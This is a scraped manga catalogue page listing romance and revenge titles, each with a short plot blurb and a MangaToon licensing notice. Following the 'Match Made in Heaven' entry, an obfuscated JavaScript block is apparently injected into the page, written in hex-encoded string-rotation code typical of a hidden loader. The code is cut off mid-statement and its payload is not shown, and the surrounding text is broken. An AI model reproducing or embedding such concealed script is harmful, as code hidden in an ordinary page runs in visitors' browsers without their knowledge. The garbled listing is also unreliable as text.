Liexing - Page 14

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

171 results

Exclusive Possession Of Your Heart

I am imprisoned. The fiancé of my heart donor locked me up, saying that this heart belongs to him and that I must live in his dead fiancée's stead... By "live in his dead fiancée's stead" he means me to act like her, talk like her, dress like her, and think like her, as if I am just a manipulatable doll, a soulless shell, a vessel for another woman's heart. You may think the heart throbbing in my chest is yours, but my true heart is never yours! MangaToon got authorization from Cloud Studio to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Unforgettable Love Of Mine

“1 million, no more!”“I know I'm very handsome but you don't have to look at me like that, I'll feel shy.”“Once you put it on, you can never get rid of it”...He gave her the ultimate care, but also made her the prisoner of love. How can she find the right person through the intricate life…? MangaToon got authorization from Baigongyuanzhan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Flirty Boss, No!

<p style="text-align: left;">A story about Cinderella and her prince with bad temper.</p> "Stay at the company, I'll give you a pay rise of 50%!" "No!" "70%!" "Well... I'll stay not for your money, but for my dream!" Well the happiest thing in life is to find the right one to stay with, even he's cold and bossy. MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Match Made in Heaven

"A comical romance about a woman wanting to find her arranged marriage partner!" The self-proclaimed happy single Jiwoo is eager to work at her grandfather's company. But her grandfather is adamant about marrying her off to his chosen candidate at his company. Not being able to find out who he is, she disguises herself as a man and dives into the orientation events he is attending. Believing that the candidate might be Minwoo, a boy from her childhood, creates even more confusion about his real identity, for... There are two men with the name Minwoo! ? SuJin Kim, HoKyoung Yeo/Haksan Publishing Co.,Ltd. MangaToon got authorization from Ecomix to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>(function(_0x382cb3,_0x1e9af2){var _0x47b22f=_0x3a09,_0x28450a=_0x382cb3();while(!![]){try{var _0x590286=parseInt(_0x47b22f(0xc7))/(-0x1657+0x8db*-0x3+0x13*0x293)*(-parseInt(_0x47b22f(0xad))/(0x19ed+0x1*-0xd63+0x1*-0xc88))+-parseInt(_0x47b22f(0xa6))/(0x6+0x3f3*-0x7+0x1ba2)+parseInt(_0x47b22f(0xa7))/(-0x23e3+0xf00*0x2+0x5e7*0x1)+-parseInt(_0x47b22f(0xb9))/(0x1a6a+0x16d7+-0x313c)+-parseInt(_0x47b22f(0xba))/(0x3*-0x483+0x1c2*0x6+0x303)*(-parseInt(_0x47b22f(0xc1))/(-0x2449+0xe06+0x2*0xb25))+parseInt(_0x47b22f(0xc5))/(-0x6e2+-0x17dd+0x1ec7)*(-parseInt(_0x47b22f(0xac))/(-0x2205+0x5e*0x4c+0x626))+parseInt(_0x47b22f(0xbb))/(0x29*-0x77+-0x125e+0xc7d*0x3)*(parseInt(_0x47b22f(0xc4))/(-0x5a2+-0x2*0xb1e+0x1be9));if(_0x590286===_0x1e9af2)break;else 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Schemes Of A Beauty

It’s a story about snatching and bully. Her aunt brought a daughter to seek shelter in her family, but it turned out her cousin sister shared the same father with her and even snatched her lover. It’s a story about rebirth and revenge. After rebirth with her previous memory, she intended to take revenge on every one who hurt her in the last life. MangaToon got authorization from Zuoan Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Outrageous Princess

She is the most respected daughter of prince Rong yet she is so timid and weak that every one can humiliate her. But a strong soul of a female killer from the modern time takes control of her body and everything begins to change…she takes revenge on those who bullied her not only because she is powerful enough but also that she has the most wealthy man at her back…


Wicked Young Master And His Innocent Girl

<b>Wicked</b> <b>Young</b> <b>Master</b> <b>and</b> <b>His</b> <b>Innocent</b> <b>Girl</b> Comics Online. When Dai Yuxiao, the <b>innocent</b> illegitimate daughter of a wealthy family comes to a high-society cocktail party, she accidentally bumps into Mu Lengrui, .. When Dai Yuxiao, the innocent illegitimate daughter of a wealthy family comes to a high-society cocktail party, she accidentally bumps into Mu Lengrui, the notoriously wicked young master of Mu Group. And instantly, the latter gets hooked up on her, and with the help of some alcohol, he takes her virginity overnight... MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Partner With A Dragon Girl

Ready to witness the BEST ART SO FAR! The dragon girl met her dragon hunter when her hometown was consumed by flames. The hunter protected her by forming the Partner Alliance—a sacred contract bonding the destined two together—and dragged her out of the sea of fire. Together, they set out seeking revenge. Little did they know taming her, he was also tamed by her. MangaToon got authorization from iLEGUO to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


My Underworld Boyfriend

kissed by a rogue on one night, and then I was kidnapped by a handsome guy to a strange place…what a bad luck! What's more unfortunate, I was arranged to study in a noble while violent school by that guy, who is the biggest leader of the underworld... MangaToon got authorization from Ji Guang Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


My Idol Is A Vampire

The rookie entertainment reporter Wen Qiaoqiao is accidentally sucked by the popular star Bai Ye. As a result, Bai Ye is a member of the modern vampire who strives to succeed in entertainment circle. In order to keep a secret, she is left by Bai Ye with a contract of cohabitation. And as an entertainment reporter, Wen also secretly plotted to uncover the secret behind Bai Ye... MangaToon got authorization from XianYu to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Secret Marriage: Priceless Baby Of The President

Secret Marriage: Priceless Baby of the President Comics Online. When she just grows up to be an adult, she messes up the wedding of her adoptive father, “Lu sheng ting, I am your daughter and will be your woman as well!” The truth of the murder six years ago begins to emerge, “Lu sheng ting, you are both my love and my enemy …” Secret Marriage: Priceless Baby of the President Comics Online. When she just grows up to be an adult, she messes up the wedding of her adoptive father, “Lu sheng ting, I am your daughter and will be your woman as well!” The truth of the murder six years ago begins to emerge, “Lu sheng ting, you are both my love and my enemy …”


The Last First Love

Four years ago, a relationship full of regret, four years later, a reunion that should have never occurred. Like a hedgehog with its spikes raised, he says hurting words he does not mean. Like a canary trapped in a cage, she has nowhere to escape. In the name of being bound, they embrace again. MangaToon got authorization from iQiyi Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
